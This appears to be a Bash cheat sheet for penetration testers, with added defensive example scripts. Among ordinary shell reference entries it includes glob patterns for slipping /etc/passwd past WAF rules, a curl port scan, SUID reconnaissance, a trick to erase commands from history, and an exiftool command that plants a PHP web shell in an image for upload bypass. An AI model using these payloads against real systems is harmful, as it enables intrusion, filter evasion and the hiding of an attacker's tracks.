# Bash

## Uname

```bash
uname -n # network node hostname
uname -r # kernel release
uname -v # kernel version
uname -p # processor type
uname -o # operating system
uname -m # machine hardware name
```

## Ctrl keys

```
Ctrl + l : Clear the screen
Ctrl + p : Move up (previous history entry)
Ctrl + n : Move down (next history entry)
Ctrl + r : Search command history
Ctrl + w : Cut the word before the cursor
Ctrl + u : Cut the line before the cursor
Ctrl + y : Paste the last cut text
Ctrl + a : Move cursor to the start of the line
Ctrl + e : Move cursor to the end of the line
Ctrl + k : Delete all text after the cursor
Ctrl + s : Stop output to the terminal
Ctrl + q : Resume output to the terminal after Ctrl + s
Ctrl + d : If you have typed something, delete the character under the cursor; on an empty line, exit the current shell
Ctrl + x, Backspace : Delete all text from the beginning of the line to the cursor
Ctrl + t : Transpose the character before the cursor with the one under it; Esc + t transposes the two words before the cursor
Ctrl + _ : Undo the last edit
Ctrl + x, Ctrl + e : Open the editor named by $EDITOR to compose the command; useful for multi-line commands
```

## Esc keys

```
Esc + u : Convert the text after the cursor to uppercase
Esc + l : Convert the text after the cursor to lowercase
Esc + c : Convert the letter under the cursor to uppercase
```

## Globbing

```bash
# '*' serves as a "wild card" for filename expansion (any run of characters).
/etc/pa*wd      # /etc/passwd

# '?' serves as a single-character "wild card" for filename expansion.
/b?n/?at        # /bin/cat

# '[]' matches one character from a set or range.
ls -l [a-z]*    # list files whose name starts with a character in the range a-z

# '{}' is brace expansion, not globbing: the list is expanded first, then each pattern is globbed.
ls {*.sh,*.py}  # list all .sh and .py files
```

## Bypass /etc/passwd WAF

```bash
/e?c/?asswd
/e*c/*asswd
/??c/?asswd
/??c/?assw?
```
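The patterns above slip past a rule that looks for the literal string `/etc/passwd` because the shell only expands them at execution time. The functions below, added here as an example and not part of the original cheat sheet, show the check a filter or log analyser has to perform instead: expand the pattern against the filesystem and compare what comes back, which catches every variant in the list as well as the plain `*` and `?` examples from the Globbing section. `make_root` builds a constructed stand-in directory (`etc/passwd`, `etc/shadow`, `bin/cat`) so the script never touches the real system; pass patterns single-quoted so the caller's shell does not expand them first.

```sh
#!/bin/sh
# make_root: constructed fixture standing in for the real filesystem root.
make_root() {
    r=$(mktemp -d)
    mkdir -p "$r/etc" "$r/bin"
    printf 'root:x:0:0:root:/root:/bin/sh\n' > "$r/etc/passwd"
    : > "$r/etc/shadow"
    : > "$r/bin/cat"
    echo "$r"
}

# expand_under ROOT PATTERN: print every path (written as absolute, /etc/passwd style)
# that PATTERN expands to beneath ROOT. Prints nothing when nothing matches.
expand_under() {
    root=$1
    pattern=${2#/}                 # the cheat sheet writes absolute paths; resolve them below ROOT
    (
        cd "$root" || exit 1
        set -- $pattern            # unquoted on purpose: this is where the shell performs the glob expansion
        [ -e "$1" ] || exit 0      # no match: the pattern came back as a literal string
        for p in "$@"; do printf '/%s\n' "$p"; done
    )
}

# reaches_protected ROOT PATTERN: succeed (exit 0) if the pattern expands to a file a
# filter would want to protect. A literal-string rule would miss /e?c/?asswd; this does not.
reaches_protected() {
    expand_under "$1" "$2" | grep -qx -e /etc/passwd -e /etc/shadow
}

# Usage:
#   ROOT=$(make_root)
#   reaches_protected "$ROOT" '/??c/?assw?' && echo "blocked: expands to a protected file"
```

The same idea applies to any input-validation layer: decide on the canonical form (here, the expanded path) and compare that, rather than the string the user typed.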

## Environment variables

```bash
$0   : name of the shell or shell script
$1, $2, $3, ... : positional parameters
$#   : number of positional parameters
$?   : exit status of the most recent foreground pipeline
$-   : current option flags set for the shell
$$   : PID of the current shell (not of a subshell)
$!   : PID of the most recent background command
```

```bash
$DESKTOP_SESSION : current display manager
$EDITOR          : preferred text editor
$LANG            : current language
$PATH            : colon-separated list of directories searched for executable files (i.e. ready-to-run programs)
$PWD             : current directory
$SHELL           : current shell
$USER            : current username
$HOSTNAME        : current hostname
```

## Read file contents

```bash
cat *                    # every file in the current directory
cat file.txt
more file.txt
head file.txt
tail file.txt
echo "$(< file.txt)"     # bash: $(< file) reads the file; a bare 'echo < file.txt' prints only a newline
grep . file.txt          # non-empty lines only
while IFS= read -r line; do printf '%s\n' "$line"; done < file.txt
```
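The `while read` loop is the one line-reading idiom here that is easy to get subtly wrong, and the mistakes matter when the file is something like a log or a password list: plain `read` strips leading whitespace and interprets backslashes, and a last line without a trailing newline is silently dropped. The script below is an added example, not part of the original cheat sheet; `make_sample` writes a constructed three-line file exercising each of those cases so the plain loop and the robust loop can be compared.

```sh
#!/bin/sh
# make_sample: constructed fixture with an indented line, a backslash, and no final newline.
make_sample() {
    f=$(mktemp)
    printf '  indented line\n' > "$f"
    printf 'back\\slash line\n' >> "$f"      # the file contains a single backslash
    printf 'no newline at end' >> "$f"       # deliberately unterminated last line
    echo "$f"
}

# naive_lines FILE: the plain loop. read drops leading blanks, treats '\' as an escape,
# and the loop body never runs for a final line that lacks a newline.
naive_lines() {
    while read line; do echo "$line"; done < "$1"
}

# robust_lines FILE: IFS= keeps whitespace, -r keeps backslashes literal, and the
# '|| [ -n "$line" ]' clause still processes an unterminated last line.
robust_lines() {
    while IFS= read -r line || [ -n "$line" ]; do printf '%s\n' "$line"; done < "$1"
}

# Usage:
#   F=$(make_sample); naive_lines "$F"; echo ---; robust_lines "$F"
```

`printf '%s\n'` rather than `echo` in the body matters for the same reason as `-r`: some shells' `echo` interprets backslash escapes in its argument, so a line read correctly can still be mangled on output.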

## Bash port scanner

John Hammond

```bash
curl http://10.10.10.1:[30000-60000]
```

## Find SUID files

```bash
find "$DIRECTORY" -perm /4000     # SUID
find "$DIRECTORY" -perm /u=s      # SUID
find "$DIRECTORY" -perm /2000     # SGID
find "$DIRECTORY" -perm /g=s      # SGID
find "$DIRECTORY" -perm /6000     # SGID + SUID
find "$DIRECTORY" -perm /u=s,g=s  # SGID + SUID
```
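On the defensive side the same `find -perm /6000` search is most useful as a baseline: record the set-id files a known-good system has, then diff a later run against it so that a newly appeared setuid binary stands out. The script below is an added example, not part of the original cheat sheet; it uses GNU `find -printf` and `comm`, and `make_fixture` builds a constructed directory tree (files owned by the current user with the set-id bits set via `chmod`) so it runs without root.

```sh
#!/bin/sh
# audit_setid DIR: one "mode path" line per regular file under DIR carrying the setuid
# or setgid bit, sorted with a fixed collation so the output can be stored as a baseline.
audit_setid() {
    find "$1" -type f -perm /6000 -printf '%m %p\n' | LC_ALL=C sort
}

# new_setid DIR BASELINE: lines present in a fresh audit of DIR but absent from BASELINE
# (a file written earlier by audit_setid). Any output here is something to investigate.
new_setid() {
    audit_setid "$1" | LC_ALL=C comm -13 "$2" -
}

# make_fixture: constructed stand-in for a real filesystem.
make_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/usr/bin"
    : > "$d/usr/bin/passwd"; chmod 4755 "$d/usr/bin/passwd"   # setuid, expected
    : > "$d/usr/bin/wall";   chmod 2755 "$d/usr/bin/wall"     # setgid, expected
    : > "$d/usr/bin/ls";     chmod 0755 "$d/usr/bin/ls"       # ordinary binary
    echo "$d"
}

# Usage:
#   audit_setid / > setid.baseline      # once, on a known-good system
#   new_setid / setid.baseline          # later: prints only set-id files that were not there before
```

Keep the baseline somewhere the audited host cannot modify; a baseline stored on the host itself can be edited by whoever added the binary you are looking for.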

## Execute command without keeping it in history

```bash
<your_secret_command>; history -d $((HISTCMD-1))
<your_secret_command>; history -d $(history 1)
```

## Processes

```bash
ps              # list processes attached to the current terminal
ps aux          # list all processes (detailed)
kill PID        # kill by process ID
pkill PROCESS   # kill by process name (kill itself only accepts PIDs)
kill -9 PID     # hard kill (SIGKILL) by process ID
lsof -i:PORT    # list processes using the specified port
```

## Hide code inside an image

```bash
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' shell.jpg
cp shell.jpg shell.php.jpg
```